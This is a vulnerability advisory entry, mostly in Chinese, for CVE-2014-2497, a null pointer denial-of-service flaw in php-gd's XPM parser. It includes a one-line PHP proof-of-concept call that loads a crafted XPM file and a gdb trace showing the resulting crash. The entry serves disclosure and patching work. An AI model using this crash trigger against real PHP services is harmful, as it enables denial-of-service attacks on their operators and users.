Lucene search

RootSSV:61811

HistoryMar 17, 2014 - 12:00 a.m.

php-gd 'gdxpm.c'空指针拒绝服务漏洞

2014-03-1700:00:00

Root

www.seebug.org

0.01 Low

EPSS

Percentile

83.5%

JSON

Bugtraq ID:66233
CVE ID:CVE-2014-2497

php-gd是一个图片处理扩展库。

php-gd 'gdxpm.c’中的gdImageCreateFromXpm()函数存在安全漏洞，调用strlen()解析image.colorTable[i].c_color时存在空指针引用错误，允许攻击者利用漏洞使链接此库的应用崩溃。
0
php-gd <= v5.4.17-2
目前没有详细解决方案提供：
http://www.php.net/


                                                php &gt; imagecreatefromxpm(&quot;monochome-poc.xpm&quot;);

(gdb) p colorTable[0]
$2 = {string = 0x7fa6cec524c0 &quot;A&quot;, symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58650 &quot;#FFFFFF&quot;}
(gdb) p colorTable[1]
$3 = {string = 0x7fa6cec58670 &quot;B&quot;, symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58690 &quot;#CCCCCC&quot;}
(gdb) p colorTable[2]
$4 = {string = 0x7fa6cec586b0 &quot;C&quot;, symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec586d0 &quot;#999999&quot;}
(gdb) p colorTable[3]
$5 = {string = 0x7fa6cec586f0 &quot;D&quot;, symbolic = 0x0, m_color = 0x7fa6cec58710 &quot;#666666&quot;, g4_color = 0x0, g_color = 0x0, c_color = 0x0}
(gdb) p colorTable[4]
$6 = {string = 0x7fa6cec58730 &quot;E&quot;, symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58750 &quot;#333333&quot;}
(gdb) p colorTable[5]
$7 = {string = 0x7fa6cec58770 &quot;F&quot;, symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58790 &quot;#000000&quot;}
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
__strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39
39		movdqu	(%rdi), %xmm1
(gdb) bt
#0  __strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39
#1  0x00007f009474942a in gdImageCreateFromXpm (filename=&lt;optimized out&gt;) at /usr/src/debug/php-5.4.17/ext/gd/libgd/gdxpm.c:42
#2  0x00007f009473d2c2 in _php_image_create_from (ht=&lt;optimized out&gt;, return_value=0x7f00a169be98, image_type=6, tn=0x7f0094753c00 &quot;XPM&quot;, func_p=0x7f0094749340 &lt;gdImageCreateFromXpm&gt;, 
    ioctx_func_p=&lt;optimized out&gt;, return_value_used=&lt;optimized out&gt;, this_ptr=&lt;optimized out&gt;, return_value_ptr=&lt;optimized out&gt;) at /usr/src/debug/php-5.4.17/ext/gd/gd.c:2534
#3  0x00007f00a19e5181 in zend_do_fcall_common_helper_SPEC (execute_data=0x7f00a1665060) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:643
#4  0x00007f00a199f017 in execute (op_array=0x7f00a169acf8) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:410
#5  0x00007f00a1932976 in zend_eval_stringl (str=str@entry=0x7f00a1699c88 &quot;imagecreatefromxpm(\&quot;0day/zero-day2.xpm\&quot;);\n&quot;, str_len=str_len@entry=42, retval_ptr=retval_ptr@entry=0x0, 
    string_name=string_name@entry=0x7f00a1a0cbdf &quot;php shell code&quot;) at /usr/src/debug/php-5.4.17/Zend/zend_execute_API.c:1197
#6  0x00007f00a181fcdf in readline_shell_run () at /usr/src/debug/php-5.4.17/ext/readline/readline_cli.c:664
#7  0x00007f00a19e78c4 in do_cli (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:986
#8  0x00007f00a179ea9a in main (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:1364